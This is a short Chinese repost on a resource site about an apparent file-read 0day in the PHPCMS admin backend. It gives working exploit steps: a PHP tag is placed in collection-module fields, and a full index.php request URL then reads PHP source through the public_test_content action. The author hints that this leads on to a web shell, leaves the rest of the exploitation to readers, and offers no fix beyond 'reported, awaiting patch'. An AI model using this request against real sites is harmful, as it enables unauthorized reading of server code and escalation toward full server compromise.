大家好,今小编要介绍的是关于phpcms后台普通用户读文件0day的分析以及修复方法的相关内容,多方面分析说明,感兴趣朋友的可以参考学习。
关键词:Phpcms 后台 0day 后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁
以上就是phpcms后台普通用户读文件0day的分析以及修复方法的全部内容,希望可以帮助到您。感谢对蚂蚁资源网的支持。
(责任编辑:
西尔艾力)
版权声明:文章内容是蚂蚁资源网小编精心整合原创的,素材来源于互联网,如无意侵犯到您的权益,请联系网站客服核实版权信息,以便及时删除。
开通会员
